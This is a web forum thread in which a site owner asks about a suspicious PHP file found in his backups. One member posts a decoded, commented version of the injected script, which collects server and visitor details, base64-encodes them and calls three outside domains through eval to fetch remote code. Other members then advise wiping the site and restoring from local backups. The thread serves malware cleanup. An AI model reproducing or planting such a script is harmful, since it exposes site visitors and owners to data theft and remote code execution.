22 replies to this topic

[Forestshopkeeper]

germ, on Oct 28 2008, 07:48 PM, said:

Both of the files you posted about in the backups folder are bad. Delete them.

Can you tell me what that particular script does? I can't make sense of it, but then, I am not a coder.
Jim

[germ]

I can't tell you what it does because the main payload(s) rely on something from another server.

All I can do is make it easier to read (reformatted, decoded, commented, and simplified as much as possible):

<? error_reporting(0);
$s="e";
// get info about this site/page/server
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
// encode it
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
if ("http://a.rsdcraft.ws/?".$str);
else if ("http://ad.runweb.info/?".$str);
else eval("http://7.xmldata.info/?".$str);
?>

[php_Guy]

germ, on Oct 28 2008, 05:57 PM, said:

Personally, I think deleting everything and reinstalling at this point is a bit premature and going overboard.

no no.. I would not delete and reinstall. It would be easier to manually inspect every file in every folder.

I was suggesting that he delete everything and re-install his last backup. And preferably, that backup should be a set of working files that have never actually resided on the webspace.

IMO, everyone should modify files locally and then upload them to their server and occasionally make a copy of those local files and set them aside as a snapshot just for this sort of thing. That way, you can delete the entire site and reload a current set of files. It should take less than half an hour even on a slow connection.

Unfortunately, some people modify the files live on the server and don't have local files. Those that do backup, (ie - download a full set of files from the server) have a backup of files that could have been infected.